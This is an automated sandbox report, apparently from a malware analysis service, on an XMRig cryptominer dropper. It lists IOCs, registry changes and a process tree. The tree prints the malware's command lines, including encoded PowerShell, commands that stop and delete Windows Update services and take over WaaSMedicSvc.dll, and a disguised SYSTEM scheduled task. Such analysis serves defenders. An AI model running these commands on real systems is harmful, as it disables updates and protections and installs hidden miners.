General
Target

a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe

Filesize

7MB

Completed

16-05-2022 00:56

Task

behavioral2

Score
10/10
MD5

95104aa61ed30687c13e5c644d5722f3

SHA1

f9788f808044d448f73203d93da0021cefb781ff

SHA256

a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301

SHA256

99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

Malware Config
Signatures 18

Filter: none

Defense Evasion
Impact
Persistence
  • Modifies security service
    reg.exe

    Tags

    TTPs

    Modify RegistryModify Existing Service

    Reported IOCs

    descriptioniocprocess
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Securityreg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0reg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1reg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInforeg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parametersreg.exe
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • XMRig Miner Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/4544-380-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
    behavioral2/memory/4544-381-0x000000014036DB84-mapping.dmpxmrig
    behavioral2/memory/4544-382-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
    behavioral2/memory/4544-383-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
    behavioral2/memory/4544-397-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
  • Executes dropped EXE
    services.exe

    Reported IOCs

    pidprocess
    3472services.exe
  • Possible privilege escalation attempt
    takeown.exeicacls.exetakeown.exeicacls.exe

    Tags

    Reported IOCs

    pidprocess
    4560takeown.exe
    4516icacls.exe
    4956takeown.exe
    4968icacls.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Modifies file permissions
    takeown.exeicacls.exetakeown.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    4560takeown.exe
    4516icacls.exe
    4956takeown.exe
    4968icacls.exe
  • Drops file in System32 directory
    powershell.execonhost.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivepowershell.exe
    File createdC:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logpowershell.exe
    File createdC:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logconhost.exe
  • Suspicious use of SetThreadContext
    conhost.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4216 set thread context of 21284216conhost.execonhost.exe
    PID 4216 set thread context of 45444216conhost.exesvchost.exe
  • Drops file in Program Files directory
    conhost.execonhost.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Program Files\Google\Libs\WR64.sysconhost.exe
    File createdC:\Program Files\Windows\services.execonhost.exe
    File opened for modificationC:\Program Files\Windows\services.execonhost.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    4940schtasks.exe
  • Modifies data under HKEY_USERS
    conhost.exepowershell.exe

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"conhost.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trustpowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLspowershell.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"powershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Rootpowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLspowershell.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"conhost.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"conhost.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeoplepowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\powershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowedpowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeoplepowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\conhost.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificatespowershell.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"powershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRootpowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLspowershell.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"conhost.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowedpowershell.exe
    Set value (data)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000powershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CApowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trustpowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishingpowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CApowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificatespowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLspowershell.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLspowershell.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"powershell.exe
    Set value (int)\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"powershell.exe
  • Modifies registry key
    reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pidprocess
    4708reg.exe
    1336reg.exe
    4424reg.exe
    4856reg.exe
    4264reg.exe
    3644reg.exe
    4412reg.exe
    4912reg.exe
    4932reg.exe
    4576reg.exe
    4340reg.exe
    5004reg.exe
    1536reg.exe
    4988reg.exe
    5024reg.exe
    1956reg.exe
    2884reg.exe
    1820reg.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.execonhost.exepowershell.execonhost.exesvchost.exe

    Reported IOCs

    pidprocess
    1676powershell.exe
    1676powershell.exe
    1676powershell.exe
    2456conhost.exe
    532powershell.exe
    532powershell.exe
    532powershell.exe
    4216conhost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
    4544svchost.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pidprocess
    640
  • Suspicious use of AdjustPrivilegeToken
    powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exesvchost.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1676powershell.exe
    Token: SeIncreaseQuotaPrivilege1676powershell.exe
    Token: SeSecurityPrivilege1676powershell.exe
    Token: SeTakeOwnershipPrivilege1676powershell.exe
    Token: SeLoadDriverPrivilege1676powershell.exe
    Token: SeSystemProfilePrivilege1676powershell.exe
    Token: SeSystemtimePrivilege1676powershell.exe
    Token: SeProfSingleProcessPrivilege1676powershell.exe
    Token: SeIncBasePriorityPrivilege1676powershell.exe
    Token: SeCreatePagefilePrivilege1676powershell.exe
    Token: SeBackupPrivilege1676powershell.exe
    Token: SeRestorePrivilege1676powershell.exe
    Token: SeShutdownPrivilege1676powershell.exe
    Token: SeDebugPrivilege1676powershell.exe
    Token: SeSystemEnvironmentPrivilege1676powershell.exe
    Token: SeRemoteShutdownPrivilege1676powershell.exe
    Token: SeUndockPrivilege1676powershell.exe
    Token: SeManageVolumePrivilege1676powershell.exe
    Token: 331676powershell.exe
    Token: 341676powershell.exe
    Token: 351676powershell.exe
    Token: 361676powershell.exe
    Token: SeDebugPrivilege2456conhost.exe
    Token: SeTakeOwnershipPrivilege4956takeown.exe
    Token: SeDebugPrivilege532powershell.exe
    Token: SeAssignPrimaryTokenPrivilege532powershell.exe
    Token: SeIncreaseQuotaPrivilege532powershell.exe
    Token: SeSecurityPrivilege532powershell.exe
    Token: SeTakeOwnershipPrivilege532powershell.exe
    Token: SeLoadDriverPrivilege532powershell.exe
    Token: SeSystemtimePrivilege532powershell.exe
    Token: SeBackupPrivilege532powershell.exe
    Token: SeRestorePrivilege532powershell.exe
    Token: SeShutdownPrivilege532powershell.exe
    Token: SeSystemEnvironmentPrivilege532powershell.exe
    Token: SeUndockPrivilege532powershell.exe
    Token: SeManageVolumePrivilege532powershell.exe
    Token: SeDebugPrivilege4216conhost.exe
    Token: SeTakeOwnershipPrivilege4560takeown.exe
    Token: SeLockMemoryPrivilege4544svchost.exe
    Token: SeLockMemoryPrivilege4544svchost.exe
  • Suspicious use of WriteProcessMemory
    a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.execmd.execmd.execmd.execmd.exeservices.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 2300 wrote to memory of 24562300a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 2300 wrote to memory of 24562300a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 2300 wrote to memory of 24562300a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 2456 wrote to memory of 37402456conhost.execmd.exe
    PID 2456 wrote to memory of 37402456conhost.execmd.exe
    PID 3740 wrote to memory of 16763740cmd.exepowershell.exe
    PID 3740 wrote to memory of 16763740cmd.exepowershell.exe
    PID 2456 wrote to memory of 13402456conhost.execmd.exe
    PID 2456 wrote to memory of 13402456conhost.execmd.exe
    PID 1340 wrote to memory of 44961340cmd.exesc.exe
    PID 1340 wrote to memory of 44961340cmd.exesc.exe
    PID 1340 wrote to memory of 27161340cmd.exesc.exe
    PID 1340 wrote to memory of 27161340cmd.exesc.exe
    PID 1340 wrote to memory of 47001340cmd.exesc.exe
    PID 1340 wrote to memory of 47001340cmd.exesc.exe
    PID 1340 wrote to memory of 15401340cmd.exesc.exe
    PID 1340 wrote to memory of 15401340cmd.exesc.exe
    PID 1340 wrote to memory of 43841340cmd.exesc.exe
    PID 1340 wrote to memory of 43841340cmd.exesc.exe
    PID 1340 wrote to memory of 48561340cmd.exereg.exe
    PID 1340 wrote to memory of 48561340cmd.exereg.exe
    PID 1340 wrote to memory of 47081340cmd.exereg.exe
    PID 1340 wrote to memory of 47081340cmd.exereg.exe
    PID 2456 wrote to memory of 47322456conhost.execmd.exe
    PID 2456 wrote to memory of 47322456conhost.execmd.exe
    PID 1340 wrote to memory of 49121340cmd.exereg.exe
    PID 1340 wrote to memory of 49121340cmd.exereg.exe
    PID 1340 wrote to memory of 49321340cmd.exereg.exe
    PID 1340 wrote to memory of 49321340cmd.exereg.exe
    PID 4732 wrote to memory of 49404732cmd.exeschtasks.exe
    PID 4732 wrote to memory of 49404732cmd.exeschtasks.exe
    PID 1340 wrote to memory of 45761340cmd.exereg.exe
    PID 1340 wrote to memory of 45761340cmd.exereg.exe
    PID 1340 wrote to memory of 49561340cmd.exetakeown.exe
    PID 1340 wrote to memory of 49561340cmd.exetakeown.exe
    PID 1340 wrote to memory of 49681340cmd.exeicacls.exe
    PID 1340 wrote to memory of 49681340cmd.exeicacls.exe
    PID 1340 wrote to memory of 43401340cmd.exereg.exe
    PID 1340 wrote to memory of 43401340cmd.exereg.exe
    PID 1340 wrote to memory of 49881340cmd.exereg.exe
    PID 1340 wrote to memory of 49881340cmd.exereg.exe
    PID 1340 wrote to memory of 50041340cmd.exereg.exe
    PID 1340 wrote to memory of 50041340cmd.exereg.exe
    PID 1340 wrote to memory of 50241340cmd.exereg.exe
    PID 1340 wrote to memory of 50241340cmd.exereg.exe
    PID 1340 wrote to memory of 50641340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 50641340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 51001340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 51001340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 18601340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 18601340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 27441340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 27441340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 27241340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 27241340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 51121340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 51121340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 13881340cmd.exeschtasks.exe
    PID 1340 wrote to memory of 13881340cmd.exeschtasks.exe
    PID 2456 wrote to memory of 32362456conhost.execmd.exe
    PID 2456 wrote to memory of 32362456conhost.execmd.exe
    PID 3236 wrote to memory of 33123236cmd.exeschtasks.exe
    PID 3236 wrote to memory of 33123236cmd.exeschtasks.exe
    PID 3472 wrote to memory of 42163472services.execonhost.exe
Processes 63
  • C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
    "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
    Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        Suspicious use of WriteProcessMemory
        PID:3740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1676
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:1340
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:4496
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:2716
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:4700
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:1540
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:4384
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:4856
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:4708
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:4912
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:4932
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:4576
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:4956
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:4968
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:4340
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:4988
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:5004
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:5024
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:5064
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:5100
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:1860
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:2744
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:2724
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:5112
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:1388
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        Suspicious use of WriteProcessMemory
        PID:4732
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          Creates scheduled task(s)
          PID:4940
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
        Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "GoogleUpdateTaskMachineQC"
          PID:3312
  • C:\Program Files\Windows\services.exe
    "C:\Program Files\Windows\services.exe"
    Executes dropped EXE
    Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4216
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        PID:3992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Drops file in System32 directory
          Modifies data under HKEY_USERS
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:532
      • C:\Windows\System32\cmd.exe
